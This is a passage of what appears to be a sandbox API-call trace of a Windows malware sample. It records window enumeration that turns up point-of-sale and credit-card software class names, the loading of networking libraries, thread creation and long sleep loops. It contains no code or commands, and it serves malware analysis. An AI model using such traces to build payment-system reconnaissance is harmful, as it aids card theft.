hWnd=0x1012a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0085.607] GetClassNameA (in: hWnd=0x10070, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10086, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10078, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10076, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10072, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10052, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Button") returned 6 [0085.608] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0085.608] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x50092, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.608] GetClassNameA (in: hWnd=0x10088, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0085.608] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Feelapp") returned 7 [0085.608] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0085.608] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="edcsvr_win") returned 10 [0085.608] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0085.608] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0085.608] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="mxslipstream") returned 12 [0085.608] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="omniposcls") returned 10 [0085.608] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0085.609] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="spgagentserviceclass") returned 20 [0085.609] GetClassNameA (in: hWnd=0x300bc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.609] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0085.609] GetClassNameA (in: hWnd=0x400e4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0085.609] GetClassNameA (in: hWnd=0x300d4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.609] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.609] GetClassNameA (in: hWnd=0x400ba, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.609] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0085.609] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0085.609] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0085.609] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ccv_serverwindow") returned 16 [0085.609] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="leechftpwindow") returned 14 [0085.609] GetClassNameA (in: hWnd=0x10298, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="icqwnd") returned 6 [0085.609] GetClassNameA (in: hWnd=0x10296, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="gmailnotifierpro_cls") returned 20 [0085.609] GetClassNameA (in: hWnd=0x10294, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="flingapp") returned 8 [0085.610] Sleep (dwMilliseconds=0x64) [0085.719] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0085.719] Sleep (dwMilliseconds=0x64) [0085.843] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0085.843] Sleep (dwMilliseconds=0x64) [0085.950] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0085.950] Sleep (dwMilliseconds=0x64) [0086.075] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0086.075] Sleep (dwMilliseconds=0x64) [0086.185] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0099.631] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0099.632] Sleep (dwMilliseconds=0x64) [0099.772] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0112.392] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0112.393] Sleep (dwMilliseconds=0x64) [0112.501] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0119.408] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0119.408] Sleep (dwMilliseconds=0x64) [0119.505] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0130.721] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0139.706] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0139.708] Sleep (dwMilliseconds=0x64) [0139.907] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0146.187] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0155.505] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0169.983] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0169.983] Sleep (dwMilliseconds=0x64) [0170.118] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0177.261] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0182.451] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0182.452] Sleep (dwMilliseconds=0x64) [0182.709] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0183.479] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0189.901] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0189.903] Sleep (dwMilliseconds=0x64) [0190.142] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0204.104] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0219.912] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0240.531] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0244.946] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0251.385] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0251.386] Sleep (dwMilliseconds=0x64) [0251.511] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0262.178] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0262.180] Sleep (dwMilliseconds=0x64) [0262.292] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0276.611] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0283.631] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) Thread: id = 97 os_tid = 0xea8 Thread: id = 105 os_tid = 0xeec [0157.020] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0157.022] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0157.024] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x6060000 [0157.027] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x10) returned 0x60612f0 [0157.027] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0157.028] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x10 [0157.037] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.037] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x12) returned 0x60612f0 [0157.037] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0157.037] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x12 [0157.038] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.038] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x10) returned 0x60612f0 [0157.038] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0157.039] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x10 [0157.039] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.039] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0xf) returned 0x60612f0 [0157.039] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0157.039] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0xf [0157.040] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x11) returned 0x60612f0 [0157.040] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0157.040] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x11 [0157.040] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x10) returned 0x60612f0 [0157.040] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0157.041] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x10 [0157.041] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.041] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x10) returned 0x60612f0 [0157.041] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0157.042] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x10 [0157.042] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.042] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x11) returned 0x60612f0 [0157.042] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0157.043] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x11 [0157.043] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0157.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2593ca4, lpParameter=0x2580000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1518 [0157.047] CloseHandle (hObject=0x1518) returned 1 [0157.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2593d80, lpParameter=0x2580000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1518 [0157.048] CloseHandle (hObject=0x1518) returned 1 [0157.048] Sleep (dwMilliseconds=0xa) [0157.054] Sleep (dwMilliseconds=0xa) [0157.070] Sleep (dwMilliseconds=0xa) [0157.085] Sleep (dwMilliseconds=0xa) [0157.150] Sleep (dwMilliseconds=0xa) [0157.194] Sleep (dwMilliseconds=0xa) [0157.217] Sleep (dwMilliseconds=0xa) [0157.226] Sleep (dwMilliseconds=0xa) [0157.241] Sleep (dwMilliseconds=0xa) [0157.262] Sleep (dwMilliseconds=0xa) [0157.273] Sleep (dwMilliseconds=0xa) [0157.288] Sleep (dwMilliseconds=0xa) [0157.305] Sleep (dwMilliseconds=0xa) [0157.319] Sleep (dwMilliseconds=0xa) [0157.335] Sleep (dwMilliseconds=0xa) [0157.351] Sleep (dwMilliseconds=0xa) [0157.367] Sleep (dwMilliseconds=0xa) [0157.381] Sleep (dwMilliseconds=0xa) [0157.397] Sleep (dwMilliseconds=0xa) [0157.413] Sleep (dwMilliseconds=0xa) [0157.428] Sleep (dwMilliseconds=0xa) [0157.444] Sleep (dwMilliseconds=0xa) [0157.460] Sleep (dwMilliseconds=0xa) [0157.476] Sleep (dwMilliseconds=0xa) [0157.491] Sleep (dwMilliseconds=0xa) [0157.506] Sleep (dwMilliseconds=0xa) [0157.522] Sleep (dwMilliseconds=0xa) [0157.537] Sleep (dwMilliseconds=0xa) [0157.553] Sleep (dwMilliseconds=0xa) [0157.569] Sleep (dwMilliseconds=0xa) [0157.615] Sleep (dwMilliseconds=0xa) [0157.631] Sleep (dwMilliseconds=0xa) [0157.647] Sleep (dwMilliseconds=0xa) [0157.662] Sleep (dwMilliseconds=0xa) [0157.679] Sleep (dwMilliseconds=0xa) [0157.693] Sleep (dwMilliseconds=0xa) [0157.712] Sleep (dwMilliseconds=0xa) [0157.725] Sleep (dwMilliseconds=0xa) [0157.740] Sleep (dwMilliseconds=0xa) [0157.756] Sleep (dwMilliseconds=0xa) [0157.771] Sleep (dwMilliseconds=0xa) [0157.788] Sleep (dwMilliseconds=0xa) [0157.803] Sleep (dwMilliseconds=0xa) [0157.818] Sleep (dwMilliseconds=0xa) [0157.834] Sleep (dwMilliseconds=0xa) [0157.863] Sleep (dwMilliseconds=0xa) [0157.865] Sleep (dwMilliseconds=0xa) [0157.881] Sleep (dwMilliseconds=0xa) [0157.898] Sleep (dwMilliseconds=0xa) [0157.912] Sleep (dwMilliseconds=0xa) [0157.927] Sleep (dwMilliseconds=0xa) [0157.943] Sleep (dwMilliseconds=0xa) [0157.959] Sleep (dwMilliseconds=0xa) [0157.974] Sleep (dwMilliseconds=0xa) [0157.990] Sleep (dwMilliseconds=0xa) [0158.037] Sleep (dwMilliseconds=0xa) [0158.058] Sleep (dwMilliseconds=0xa) [0158.068] Sleep (dwMilliseconds=0xa) [0158.084] Sleep (dwMilliseconds=0xa) [0158.101] Sleep (dwMilliseconds=0xa) [0158.115] Sleep (dwMilliseconds=0xa) [0158.130] Sleep (dwMilliseconds=0xa) [0158.149] Sleep (dwMilliseconds=0xa) [0158.161] Sleep (dwMilliseconds=0xa) [0158.177] Sleep (dwMilliseconds=0xa) [0158.193] Sleep (dwMilliseconds=0xa) [0158.208] Sleep (dwMilliseconds=0xa) [0158.255] Sleep (dwMilliseconds=0xa) [0158.272] Sleep (dwMilliseconds=0xa) [0158.286] Sleep (dwMilliseconds=0xa) [0158.318] Sleep (dwMilliseconds=0xa) [0158.333] Sleep (dwMilliseconds=0xa) [0158.349] Sleep (dwMilliseconds=0xa) [0158.364] Sleep (dwMilliseconds=0xa) [0158.382] Sleep (dwMilliseconds=0xa) [0158.396] Sleep (dwMilliseconds=0xa) [0158.411] Sleep (dwMilliseconds=0xa) [0158.427] Sleep (dwMilliseconds=0xa) [0158.473] Sleep (dwMilliseconds=0xa) [0158.489] Sleep (dwMilliseconds=0xa) [0158.506] Sleep (dwMilliseconds=0xa) [0158.520] Sleep (dwMilliseconds=0xa) [0158.536] Sleep (dwMilliseconds=0xa) [0158.552] Sleep (dwMilliseconds=0xa) [0158.567] Sleep (dwMilliseconds=0xa) [0158.583] Sleep (dwMilliseconds=0xa) [0158.598] Sleep (dwMilliseconds=0xa) [0158.614] Sleep (dwMilliseconds=0xa) [0158.630] Sleep (dwMilliseconds=0xa) [0158.645] Sleep (dwMilliseconds=0xa) [0158.661] Sleep (dwMilliseconds=0xa) [0158.676] Sleep (dwMilliseconds=0xa) [0158.692] Sleep (dwMilliseconds=0xa) [0158.709] Sleep (dwMilliseconds=0xa) [0158.724] Sleep (dwMilliseconds=0xa) [0158.740] Sleep (dwMilliseconds=0xa) [0158.754] Sleep (dwMilliseconds=0xa) [0158.771] Sleep (dwMilliseconds=0xa) [0158.785] Sleep (dwMilliseconds=0xa) [0158.801] Sleep (dwMilliseconds=0xa) [0158.817] Sleep (dwMilliseconds=0xa) [0158.833] Sleep (dwMilliseconds=0xa) [0158.849] Sleep (dwMilliseconds=0xa) [0158.887] Sleep (dwMilliseconds=0xa) [0158.895] Sleep (dwMilliseconds=0xa) [0158.910] Sleep (dwMilliseconds=0xa) [0158.958] Sleep (dwMilliseconds=0xa) [0158.973] Sleep (dwMilliseconds=0xa) [0158.988] Sleep (dwMilliseconds=0xa) [0159.004] Sleep (dwMilliseconds=0xa) [0159.020] Sleep (dwMilliseconds=0xa) [0159.035] Sleep (dwMilliseconds=0xa) [0159.051] Sleep (dwMilliseconds=0xa) [0159.068] Sleep (dwMilliseconds=0xa) [0159.082] Sleep (dwMilliseconds=0xa) [0159.098] Sleep (dwMilliseconds=0xa) [0159.113] Sleep (dwMilliseconds=0xa) [0159.129] Sleep (dwMilliseconds=0xa) [0159.178] Sleep (dwMilliseconds=0xa) [0159.191] Sleep (dwMilliseconds=0xa) [0159.227] Sleep (dwMilliseconds=0xa) [0159.238] Sleep (dwMilliseconds=0xa) [0159.259] Sleep (dwMilliseconds=0xa) [0159.269] Sleep (dwMilliseconds=0xa) [0159.285] Sleep (dwMilliseconds=0xa) [0159.300] Sleep (dwMilliseconds=0xa) [0159.316] Sleep (dwMilliseconds=0xa) [0159.338] Sleep (dwMilliseconds=0xa) [0159.389] Sleep (dwMilliseconds=0xa) [0159.428] Sleep (dwMilliseconds=0xa) [0159.510] Sleep (dwMilliseconds=0xa) [0159.522] Sleep (dwMilliseconds=0xa) [0159.536] Sleep (dwMilliseconds=0xa) [0159.550] Sleep (dwMilliseconds=0xa) [0159.582] Sleep (dwMilliseconds=0xa) [0159.629] Sleep (dwMilliseconds=0xa) [0159.681] Sleep (dwMilliseconds=0xa) [0159.733] Sleep (dwMilliseconds=0xa) [0159.742] Sleep (dwMilliseconds=0xa) [0159.768] Sleep (dwMilliseconds=0xa) [0159.788] Sleep (dwMilliseconds=0xa) [0159.802] Sleep (dwMilliseconds=0xa) [0159.815] Sleep (dwMilliseconds=0xa) [0159.895] Sleep (dwMilliseconds=0xa) [0159.943] Sleep (dwMilliseconds=0xa) [0159.971] Sleep (dwMilliseconds=0xa) [0159.987] Sleep (dwMilliseconds=0xa) [0160.033] Sleep (dwMilliseconds=0xa) [0160.076] Sleep (dwMilliseconds=0xa) [0160.119] Sleep (dwMilliseconds=0xa) [0160.200] Sleep (dwMilliseconds=0xa) [0160.235] Sleep (dwMilliseconds=0xa) [0160.236] Sleep (dwMilliseconds=0xa) [0160.268] Sleep (dwMilliseconds=0xa) [0160.283] Sleep (dwMilliseconds=0xa) [0160.300] Sleep (dwMilliseconds=0xa) [0160.347] Sleep (dwMilliseconds=0xa) [0160.410] Sleep (dwMilliseconds=0xa) [0160.431] Sleep (dwMilliseconds=0xa) [0160.439] Sleep (dwMilliseconds=0xa) [0160.468] Sleep (dwMilliseconds=0xa) [0160.470] Sleep (dwMilliseconds=0xa) [0160.486] Sleep (dwMilliseconds=0xa) [0160.508] Sleep (dwMilliseconds=0xa) [0160.552] Sleep (dwMilliseconds=0xa) [0160.597] Sleep (dwMilliseconds=0xa) [0160.632] Sleep (dwMilliseconds=0xa) [0160.649] Sleep (dwMilliseconds=0xa) [0160.658] Sleep (dwMilliseconds=0xa) [0160.690] Sleep (dwMilliseconds=0xa) [0160.705] Sleep (dwMilliseconds=0xa) [0160.753] Sleep (dwMilliseconds=0xa) [0160.845] Sleep (dwMilliseconds=0xa) [0160.896] Sleep (dwMilliseconds=0xa) [0160.952] Sleep (dwMilliseconds=0xa) [0160.954] Sleep (dwMilliseconds=0xa) [0160.986] Sleep (dwMilliseconds=0xa) [0161.022] Sleep (dwMilliseconds=0xa) [0161.064] Sleep (dwMilliseconds=0xa) [0161.112] Sleep (dwMilliseconds=0xa) [0161.145] Sleep (dwMilliseconds=0xa) [0161.163] Sleep (dwMilliseconds=0xa) [0161.173] Sleep (dwMilliseconds=0xa) [0161.188] Sleep (dwMilliseconds=0xa) [0161.204] Sleep (dwMilliseconds=0xa) [0161.220] Sleep (dwMilliseconds=0xa) [0161.247] Sleep (dwMilliseconds=0xa) [0161.283] Sleep (dwMilliseconds=0xa) [0161.331] Sleep (dwMilliseconds=0xa) [0161.385] Sleep (dwMilliseconds=0xa) [0161.393] Sleep (dwMilliseconds=0xa) [0161.406] Sleep (dwMilliseconds=0xa) [0161.422] Sleep (dwMilliseconds=0xa) [0161.438] Sleep (dwMilliseconds=0xa) [0161.453] Sleep (dwMilliseconds=0xa) [0161.473] Sleep (dwMilliseconds=0xa) [0161.521] Sleep (dwMilliseconds=0xa) [0161.575] Sleep (dwMilliseconds=0xa) [0161.602] Sleep (dwMilliseconds=0xa) [0161.610] Sleep (dwMilliseconds=0xa) [0161.627] Sleep (dwMilliseconds=0xa) [0161.647] Sleep (dwMilliseconds=0xa) [0161.656] Sleep (dwMilliseconds=0xa) [0161.672] Sleep (dwMilliseconds=0xa) [0161.687] Sleep (dwMilliseconds=0xa) [0161.734] Sleep (dwMilliseconds=0xa) [0161.781] Sleep (dwMilliseconds=0xa) [0161.803] Sleep (dwMilliseconds=0xa) [0161.816] Sleep (dwMilliseconds=0xa) [0161.836] Sleep (dwMilliseconds=0xa) [0161.853] Sleep (dwMilliseconds=0xa) [0161.886] Sleep (dwMilliseconds=0xa) [0161.890] Sleep (dwMilliseconds=0xa) [0161.939] Sleep (dwMilliseconds=0xa) [0161.984] Sleep (dwMilliseconds=0xa) [0162.022] Sleep (dwMilliseconds=0xa) [0162.050] Sleep (dwMilliseconds=0xa) [0162.061] Sleep (dwMilliseconds=0xa) [0162.077] Sleep (dwMilliseconds=0xa) [0162.093] Sleep (dwMilliseconds=0xa) [0162.108] Sleep (dwMilliseconds=0xa) [0162.164] Sleep (dwMilliseconds=0xa) [0162.219] Sleep (dwMilliseconds=0xa) [0162.248] Sleep (dwMilliseconds=0xa) [0162.271] Sleep (dwMilliseconds=0xa) [0162.291] Sleep (dwMilliseconds=0xa) [0162.299] Sleep (dwMilliseconds=0xa) [0162.312] Sleep (dwMilliseconds=0xa) [0162.327] Sleep (dwMilliseconds=0xa) [0162.374] Sleep (dwMilliseconds=0xa) [0162.423] Sleep (dwMilliseconds=0xa) [0162.468] Sleep (dwMilliseconds=0xa) [0162.498] Sleep (dwMilliseconds=0xa) [0162.834] Sleep (dwMilliseconds=0xa) [0162.873] Sleep (dwMilliseconds=0xa) [0162.921] Sleep (dwMilliseconds=0xa) [0163.002] Sleep (dwMilliseconds=0xa) [0163.072] Sleep (dwMilliseconds=0xa) [0163.081] Sleep (dwMilliseconds=0xa) [0163.331] Sleep (dwMilliseconds=0xa) [0163.593] Sleep (dwMilliseconds=0xa) [0163.776] Sleep (dwMilliseconds=0xa) [0163.818] Sleep (dwMilliseconds=0xa) [0163.895] Sleep (dwMilliseconds=0xa) [0163.902] Sleep (dwMilliseconds=0xa) [0163.918] Sleep (dwMilliseconds=0xa) [0163.933] Sleep (dwMilliseconds=0xa) [0163.950] Sleep (dwMilliseconds=0xa) [0163.965] Sleep (dwMilliseconds=0xa) [0164.013] Sleep (dwMilliseconds=0xa) [0164.058] Sleep (dwMilliseconds=0xa) [0164.099] Sleep (dwMilliseconds=0xa) [0164.105] Sleep (dwMilliseconds=0xa) [0164.122] Sleep (dwMilliseconds=0xa) [0164.136] Sleep (dwMilliseconds=0xa) [0164.154] Sleep (dwMilliseconds=0xa) [0164.168] Sleep (dwMilliseconds=0xa) [0164.184] Sleep (dwMilliseconds=0xa) [0164.233] Sleep (dwMilliseconds=0xa) [0164.277] Sleep (dwMilliseconds=0xa) [0164.526] Sleep (dwMilliseconds=0xa) [0164.547] Sleep (dwMilliseconds=0xa) [0164.557] Sleep (dwMilliseconds=0xa) [0164.573] Sleep (dwMilliseconds=0xa) [0164.589] Sleep (dwMilliseconds=0xa) [0164.636] Sleep (dwMilliseconds=0xa) [0164.685] Sleep (dwMilliseconds=0xa) [0164.741] Sleep (dwMilliseconds=0xa) [0164.745] Sleep (dwMilliseconds=0xa) [0164.760] Sleep (dwMilliseconds=0xa) [0164.776] Sleep (dwMilliseconds=0xa) [0164.792] Sleep (dwMilliseconds=0xa) [0164.807] Sleep (dwMilliseconds=0xa) [0164.849] Sleep (dwMilliseconds=0xa) [0164.923] Sleep (dwMilliseconds=0xa) [0165.047] Sleep (dwMilliseconds=0xa) [0165.057] Sleep (dwMilliseconds=0xa) [0165.072] Sleep (dwMilliseconds=0xa) [0165.088] Sleep (dwMilliseconds=0xa) [0165.104] Sleep (dwMilliseconds=0xa) [0165.151] Sleep (dwMilliseconds=0xa) [0165.198] Sleep (dwMilliseconds=0xa) [0165.223] Sleep (dwMilliseconds=0xa) [0165.228] Sleep (dwMilliseconds=0xa) [0165.244] Sleep (dwMilliseconds=0xa) [0165.260] Sleep (dwMilliseconds=0xa) [0165.275] Sleep (dwMilliseconds=0xa) [0165.291] Sleep (dwMilliseconds=0xa) [0165.306] Sleep (dwMilliseconds=0xa) [0165.353] Sleep (dwMilliseconds=0xa) [0165.401] Sleep (dwMilliseconds=0xa) [0165.422] Sleep (dwMilliseconds=0xa) [0165.431] Sleep (dwMilliseconds=0xa) [0165.447] Sleep (dwMilliseconds=0xa) [0165.462] Sleep (dwMilliseconds=0xa) [0165.478] Sleep (dwMilliseconds=0xa) [0165.494] Sleep (dwMilliseconds=0xa) [0165.510] Sleep (dwMilliseconds=0xa) [0165.558] Sleep (dwMilliseconds=0xa) [0165.632] Sleep (dwMilliseconds=0xa) [0165.723] Sleep (dwMilliseconds=0xa) [0165.727] Sleep (dwMilliseconds=0xa) [0165.744] Sleep (dwMilliseconds=0xa) [0165.759] Sleep (dwMilliseconds=0xa) [0165.775] Sleep (dwMilliseconds=0xa) [0165.821] Sleep (dwMilliseconds=0xa) [0165.892] Sleep (dwMilliseconds=0xa) [0165.916] Sleep (dwMilliseconds=0xa) [0165.930] Sleep (dwMilliseconds=0xa) [0165.946] Sleep (dwMilliseconds=0xa) [0165.962] Sleep (dwMilliseconds=0xa) [0165.992] Sleep (dwMilliseconds=0xa) [0165.993] Sleep (dwMilliseconds=0xa) [0166.040] Sleep (dwMilliseconds=0xa) [0166.088] Sleep (dwMilliseconds=0xa) [0166.133] Sleep (dwMilliseconds=0xa) [0166.149] Sleep (dwMilliseconds=0xa) [0166.165] Sleep (dwMilliseconds=0xa) [0166.180] Sleep (dwMilliseconds=0xa) [0166.197] Sleep (dwMilliseconds=0xa) [0166.211] Sleep (dwMilliseconds=0xa) [0166.258] Sleep (dwMilliseconds=0xa) [0166.306] Sleep (dwMilliseconds=0xa) [0166.347] Sleep (dwMilliseconds=0xa) [0166.352] Sleep (dwMilliseconds=0xa) [0166.367] Sleep (dwMilliseconds=0xa) [0166.383] Sleep (dwMilliseconds=0xa) [0166.398] Sleep (dwMilliseconds=0xa) [0166.415] Sleep (dwMilliseconds=0xa) [0166.429] Sleep (dwMilliseconds=0xa) [0166.476] Sleep (dwMilliseconds=0xa) [0166.524] Sleep (dwMilliseconds=0xa) [0166.570] Sleep (dwMilliseconds=0xa) [0166.571] Sleep (dwMilliseconds=0xa) [0166.586] Sleep (dwMilliseconds=0xa) [0166.602] Sleep (dwMilliseconds=0xa) [0166.617] Sleep (dwMilliseconds=0xa) [0166.634] Sleep (dwMilliseconds=0xa) [0166.648] Sleep (dwMilliseconds=0xa) [0166.696] Sleep (dwMilliseconds=0xa) [0166.743] Sleep (dwMilliseconds=0xa) [0166.790] Sleep (dwMilliseconds=0xa) [0166.804] Sleep (dwMilliseconds=0xa) [0166.819] Sleep (dwMilliseconds=0xa) [0166.836] Sleep (dwMilliseconds=0xa) [0166.852] Sleep (dwMilliseconds=0xa) [0166.866] Sleep (dwMilliseconds=0xa) [0166.914] Sleep (dwMilliseconds=0xa) [0166.961] Sleep (dwMilliseconds=0xa) [0167.026] Sleep (dwMilliseconds=0xa) [0167.038] Sleep (dwMilliseconds=0xa) [0167.053] Sleep (dwMilliseconds=0xa) [0167.070] Sleep (dwMilliseconds=0xa) [0167.085] Sleep (dwMilliseconds=0xa) [0167.100] 